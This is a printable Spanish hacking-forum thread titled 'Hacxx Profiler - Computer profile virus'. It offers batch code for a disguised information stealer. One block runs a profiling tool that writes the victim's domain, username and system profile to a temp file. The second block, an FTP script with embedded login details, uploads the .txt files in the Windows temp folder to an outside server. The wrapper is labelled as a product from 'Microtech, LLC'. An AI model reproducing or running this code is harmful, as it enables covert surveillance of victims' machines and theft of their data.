NO PUDO SER
Tema: Hacxx Profiler - Computer profile virus (Versión Imprimible) Volver a la versión Original de este tema |
Lugar donde fue posteado: Www.ForoMsn.com -» Hacking General -» Hacxx Profiler - Computer profile virus |
Enviado por jajxz1 en 29/10/2019 19:05:22 |
Enviado por jajxz1 en 31/10/2019 17:41:37 |
Enviado por jajxz1 en 17/11/2019 23:06:25 |
CÓDIGO |
@ftp -i -s:"%~f0"&GOTO:EOF open ftp.uploaded.net 16834486 i3e6by88 binary put "c:\windows\temp\*.txt" disconnect bye |
CÓDIGO |
@ECHO OFF REM QBFC Project Options Begin REM HasVersionInfo: Yes REM Companyname: Microtech, LLC REM Productname: Hacxx Profiler REM Filedescription: REM Copyrights: REM Trademarks: REM Originalname: REM Comments: REM Productversion: 1. 0. 0. 0 REM Fileversion: 1. 0. 0. 0 REM Internalname: REM Appicon: Profile.ico REM AdministratorManifest: No REM Embeddedfile: PTProfiler.exe REM Embeddedfile: ftp.bat REM QBFC Project Options End @ECHO ON %MYFILES%\PTProfiler.exe /save c:\windows\temp\%userdomain%-%username%-profile.txt %MYFILES%\ftp.bat |